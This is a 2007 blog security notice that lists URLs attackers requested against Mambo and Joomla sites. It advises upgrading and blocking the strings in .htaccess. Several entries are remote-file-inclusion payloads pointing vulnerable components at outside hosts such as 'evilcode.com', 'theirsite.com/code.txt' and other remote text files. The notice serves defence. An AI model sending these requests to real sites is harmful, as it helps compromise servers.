|
Security Notice: Mambo and Joomla Hack Attempts More Rampant |
|
Wednesday, 06 June 2007 |
Updated 6/10/2007
MAJOR UPDATE! - This is a file used to find "vulnerable" site using Google. Coincidentally, it contains strings that you should block in your .htaccess file.
It seems that many hackers (mostly Turkish, according to my server logs) have been attempting to break into Joomla and Mambo based sites. They usually attack just by requesting a URL that at the same time would be able to change your CMS settings if you aren't up to date, and hardened. Some of these URLs include the following:
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt
//administrator/components/com_mamboboard/file_upload.php=http://www.evilcode.com
/projects/libraries/pcl/pcltar.php
/site-announcements//administrator/components/com_uhp/uhp_config.php
/administrator/components/com_babackup/classes/Tar.php
//administrator/components/com_mamboboard/file_upload.php=http://theirevilurl.com
//administrator/components/com_remository/admin.remository.php http://www.evilcode.com/
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php
/administrator/components/com_comprofiler/plugin.class.php
/administrator/components/com_cropimage/admin.cropcanvas.php
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
/administrator/components/com_mgm/help.mgm.php
/administrator/components/com_remository/admin.remository.php
/administrator/components/com_serverstat/install.serverstat.php
/administrator/components/com_uhp/uhp_config.php
/administrator/components/com_webring/admin.webring.docs.php
/components/com_artlinks/artlinks.dispnew.php
/components/com_cpg/cpg.php
/components/com_galleria/galleria.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/components/com_phpshop/toolbar.phpshop.html.php
/components/com_rsgallery/rsgallery.html.php
/components/com_smf/smf.php
/components/com_zoom/includes/database.php
//function.is-dir
/function.is-dir
//administrator/components/com_remository/admin.remository.php
/function.require
/function.require-once
/components/com_zoom/classes/iptc/EXIF_Makernote.php
//components/com_joomlaboard/file_upload.php
/administrator/:/www.mattparnell.com/index.php
/projects//components/com_joomlaboard/file_upload.php
/projects/top-10-must-have-joomla-addons.html//components/com_joomlaboard/file_upload.php
/projects//components/com_joomlaboard/file_upload.php
///administrator/components/com_mgm/help.mgm.php
//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
//administrator/components/com_uhp/uhp_config.php
//classes/adodbt/sql.php
//components/com_cpg/cpg.php
//components/com_mtree/Savant2/Savant2_Plugin_textarea.php
//components/com_phpshop/toolbar.phpshop.html.php
//components/com_rsgallery/rsgallery.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/dministrator/components/com_remository/admin.remository.php
/shady-stuff/interesting-open-directories.htmljavascript:ac_smilie(
New as of June 9:
/'<a
/allinurl:%22.php
//administrator/components/com_serverstat/install.serverstat.php
//components/com_remository/admin.remository.php
//components/com_zoom/classes/iptc/EXI_Makernote.php
//performs.php
/administrator/index2.pp
/components/com_videodb/core/videodb.class.xml.php
/components/com_zoom/classes/iptc/EXIF.php
/com_mtreehttp://efardella.cinet.it/claroline/phpbb/id.txt
/com_uhphttp://jargo.phpnet.us/ilkom.txt
/site-announcements//components/com_remository/admin.remository.php
/site-announcements/components/com_rsgallery/rsgallery.html.php
Note that the one in bold is the one that I see attempted the most. I suggest you upgrade to the latest stable version of Mambo or Joomla, and implement .htaccess blocks to redirect people going to these addresses to a noindex.html page (don't click, mine loops in infiinite redirects to itself...I need to get it to make a popup of itself onload at some point too, to make life even harder for the would-be hacker)...
|
